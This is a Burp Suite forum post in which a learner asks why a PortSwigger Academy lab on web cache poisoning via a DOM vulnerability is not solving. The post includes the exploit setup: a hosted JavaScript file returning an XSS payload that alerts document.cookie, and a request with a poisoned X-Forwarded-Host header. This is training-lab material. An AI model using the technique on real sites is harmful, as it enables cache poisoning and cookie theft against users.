The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Lab Not Responding

Nikhil | Last updated: Jul 08, 2020 01:47PM UTC

I am Doing Practice on Web cache poisoning to exploit a DOM vulnerability via a cache with strict cacheability criteria Lab But Alert doesnt calling out. i Tried 10 times at regular interval but that didn't work. X-Cache: hit it always showed in response but nothin happens in browser when reload i am sending the request from reapeater from 10 mins but lab is not showing Exploit Details: File:- /resources/js/geolocate.js Head:- HTTP/1.1 200 OK Content-Type: application/javascript; charset=utf-8 Access-Control-Allow-Origin: * Body:- { "country": "<img src=1 onerror=alert(document.cookie) />" } Request:- GET / HTTP/1.1 Host: ac931f2d1e2d75f4806a30d100b700dc.web-security-academy.net X-Forwarded-Host: ac251f201eed754b802a3017013a00ed.web-security-academy.net User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://portswigger.net/web-security/web-cache-poisoning/exploiting/lab-web-cache-poisoning-to-exploit-a-dom-vulnerability-via-a-cache-with-strict-cacheability-criteria Connection: close Cookie: session=bt69qKCHuU2Lxft7YR2bRGYAGYjpra7I Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 Response:- HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Connection: close Cache-Control: max-age=30 Age: 12 X-Cache: hit X-XSS-Protection: 0 Content-Length: 11203

Hannah, PortSwigger Agent | Last updated: Jul 10, 2020 07:11AM UTC